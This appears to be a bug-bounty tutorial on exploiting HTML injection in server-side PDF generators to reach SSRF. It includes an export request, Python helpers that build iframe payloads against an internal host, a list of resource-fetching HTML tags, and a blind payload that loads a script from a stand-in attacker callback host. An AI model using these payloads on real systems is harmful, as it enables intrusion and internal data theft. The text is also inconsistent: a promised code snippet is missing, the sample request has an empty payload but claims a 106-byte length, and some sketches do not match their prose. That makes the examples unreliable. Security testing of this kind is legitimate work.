A complete guide to finding SSRF vulnerabilities in PDF generators

PDF generators are commonly found in web applications. Developers tend to use these components to generate documents from dynamic data, for example data pulled from a database. Unfortunately, not every developer is aware of the risks they might introduce when integrating this functionality.

In this article, we will dive deep into the implications of processing unsanitized user-controllable input in PDF generators, how we can exploit these features, and how we can escalate our initial findings for more impact.

Let’s dive in!

A PDF generator is a component within a web application that creates PDF documents from dynamic data retrieved from parameters, database contents or other data sources. PDF generators have many applications, from receipt and invoice generation to report and certificate issuing.

Developers often resort to using popular (open-source) libraries and third-party services to generate dynamic PDF documents. These libraries make use of several methods to generate dynamic PDF documents.

Let’s explore the three common ways your target may generate a PDF export for you.

HTML to PDF (most common approach)

This process often involves deploying a headless web browser (such as Chromium), rendering the HTML template with dynamic data and calling a browser API to generate the PDF document. This entire document-generating process often takes place on the server side as it takes time to create PDF file exports.

If user-controllable input is concatenated directly into the HTML template without proper sanitization, the template may be susceptible to HTML injection, which in most cases can be escalated further to server-side request forgery (SSRF), local file disclosure (LFD) and other vulnerability types.
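To make the difference concrete, here is a minimal sketch that contrasts raw concatenation with HTML-encoding the same value. The template, the function names and the `internal.example` host are assumptions made up for illustration; they do not come from any particular PDF library.

```python
import html

# Hypothetical invoice template; {name} marks where dynamic data lands.
TEMPLATE = "<html><body><h1>Invoice</h1><p>Customer: {name}</p></body></html>"


def render_unsafe(name: str) -> str:
    """Place raw input into the template (the vulnerable pattern)."""
    return TEMPLATE.format(name=name)


def render_escaped(name: str) -> str:
    """HTML-encode metacharacters before the value reaches the template."""
    return TEMPLATE.format(name=html.escape(name, quote=True))


# Illustrative payload pointing at a made-up internal host.
payload = '<iframe src="http://internal.example/"></iframe>'

unsafe_html = render_unsafe(payload)    # contains a live <iframe> element
escaped_html = render_escaped(payload)  # contains inert text: &lt;iframe ...
```

If the HTML from `render_unsafe` is handed to a headless browser, the browser treats the iframe as markup and fetches its source. With `render_escaped`, the same input is only displayed as text.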

Template-based generation

Some libraries rely on pre-structured templates defined in a specific template language. Dynamic data is later mapped to the template fields before the final document is rendered and exported.

Just as with the previous method, if user-controllable input is concatenated directly into the template, it may be susceptible to injection attacks that result in a wide range of vulnerabilities, from simple content injection to code injection and remote code execution.

TIP! CVE-2023-33733, a code injection flaw in the ReportLab PDF library, is a good example of how an injection issue can be escalated into code execution!

Third-party service

Some applications make use of external services. This process often relies on sending the dynamic data to the third-party API and receiving the PDF file in the API response. Third-party services offering managed PDF generation are often less susceptible to injection attacks.

This method is less commonly used because it does not always guarantee privacy, especially when sensitive data (such as invoices and receipts) is sent to an external party.

In this article, we will mainly cover the first and the most common PDF-generating method.

PDF generators are commonly used in web applications to generate dynamic documents such as:

Reports (for example, analytics reports or any other report types)
Receipts & invoices (especially in e-commerce targets)
Account archives
Bank account statements
Certificates (more prevalent in education & training platforms)

Example of PDF generation feature

Let’s now take a detailed look at how to exploit PDF generators to achieve server-side request forgery and further escalate our initial findings!

Generating a PDF can take time, which is why it usually happens on the server side and often asynchronously (more on this later). When user-controllable data is processed in an unsafe way and concatenated directly into an HTML template, it may be possible to inject HTML or arbitrary JavaScript code.

Let’s take a look at a few examples.

Exploiting full SSRF vulnerabilities

Take a look at the following code snippet:

The API endpoint takes in the invoiceData body parameter and renders the user-controllable HTML without proper sanitization. This means that we can render arbitrary HTML tags, including script tags, allowing JavaScript to be executed on the server side.
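As a rough illustration of the pattern described above, the sketch below shows how such an endpoint might assemble its HTML. It is not the original application code: the function name `build_invoice_html` and the surrounding markup are assumptions, and the step that hands the HTML to a headless browser is left out.

```python
import json


def build_invoice_html(raw_body: bytes) -> str:
    """Build the HTML that would later be rendered to PDF (hypothetical handler)."""
    data = json.loads(raw_body)
    invoice_data = data.get("invoiceData", "")

    # Vulnerable: the user-supplied value is concatenated as-is, so any tag
    # it contains (iframe, script, ...) becomes part of the rendered page.
    return "<html><body><h1>Invoice</h1>" + invoice_data + "</body></html>"


# Example: a script tag survives untouched in the generated document.
example_body = json.dumps(
    {"invoiceData": "<script>document.write(1)</script>"}
).encode("utf-8")
example_html = build_invoice_html(example_body)
```

In a real application the returned string would typically be loaded into a headless browser and exported as PDF, which is the point at which injected markup gets evaluated on the server.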

With this information, we can craft a payload to render the response of any resource on behalf of the target server. Sending the following request, for example, would allow us to retrieve a PDF file with the rendered response:

POST /api/invoice/export HTTP/2
Host: app.example.com
Content-Type: application/json
Content-Length: 106

{
    "invoiceData": ""
}
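As a minimal sketch of how an iframe-based `invoiceData` value could be built and encoded for a request like this one, consider the snippet below. The target URL, the iframe dimensions and the function name are assumptions chosen for illustration only.

```python
import json

# Hypothetical internal resource we want the server to fetch on our behalf.
TARGET_URL = "http://internal.example/admin"


def build_export_body(url: str) -> bytes:
    """Return a JSON request body whose invoiceData holds an iframe payload."""
    iframe = f'<iframe src="{url}" width="800" height="600"></iframe>'
    # json.dumps escapes the double quotes inside the HTML for us.
    return json.dumps({"invoiceData": iframe}, indent=4).encode("utf-8")


body = build_export_body(TARGET_URL)
content_length = len(body)  # value to send in the Content-Length header
```

Letting a JSON encoder handle the escaping avoids malformed bodies caused by hand-escaped quotes, and computing the length from the encoded bytes keeps the `Content-Length` header accurate.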

Example of a rendered PDF file

Unfortunately, the iframe tag won’t work in all cases. Some targets have already deployed active measures against injection attacks such as XSS. If your tag gets blocked, try one of the following payloads instead to request external content on behalf of your target:
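The helper below sketches a few HTML elements that are commonly known to make a browser fetch a remote resource. It is an illustrative set, not an exhaustive or authoritative list, and whether any of them gets past a given filter or shows the response in the PDF depends on the target. The function name and URL are assumptions.

```python
def candidate_payloads(url: str) -> dict[str, str]:
    """Map a tag name to an HTML snippet that requests `url` when rendered."""
    return {
        "img": f'<img src="{url}">',
        "link": f'<link rel="stylesheet" href="{url}">',
        "object": f'<object data="{url}"></object>',
        "embed": f'<embed src="{url}">',
        "meta": f'<meta http-equiv="refresh" content="0; url={url}">',
    }


# Hypothetical internal URL used only to show the output shape.
payloads = candidate_payloads("http://internal.example/")
for tag, snippet in payloads.items():
    print(f"{tag}: {snippet}")
```

Tags such as `img` and `link` usually only prove that a request was made, while `object`, `embed` and a `meta` refresh are more likely to place the fetched content in the document itself.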

Exploiting blind SSRF vulnerabilities

In some cases, full SSRF won’t be possible, for example because of aggressive XSS filters. In this case, we can still attempt to request external resources on behalf of the server by injecting a blind XSS payload:
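One way to approach this, sketched below under stated assumptions, is to embed a unique token in each injected payload so that an incoming callback can be traced back to the field that triggered it. The callback host `callback.example`, the script-tag shape and the function name are hypothetical; any server you control that logs requests would serve the same purpose.

```python
import secrets
from urllib.parse import quote

# Hypothetical attacker-controlled host that logs incoming requests.
CALLBACK_HOST = "callback.example"


def blind_payload(field: str) -> tuple[str, str]:
    """Return (token, payload) for one injection point.

    The token appears in the callback hostname, so a logged request reveals
    which injected field was rendered by the PDF generator.
    """
    token = secrets.token_hex(8)  # 16 hex characters, unique per payload
    src = f"https://{token}.{CALLBACK_HOST}/{quote(field, safe='')}.js"
    return token, f'<script src="{src}"></script>'


token, payload = blind_payload("invoiceData")
```

Keeping a record of each token and the field it was sent in makes it possible to confirm the blind SSRF later, even when the PDF is generated asynchronously and the callback arrives minutes after the request.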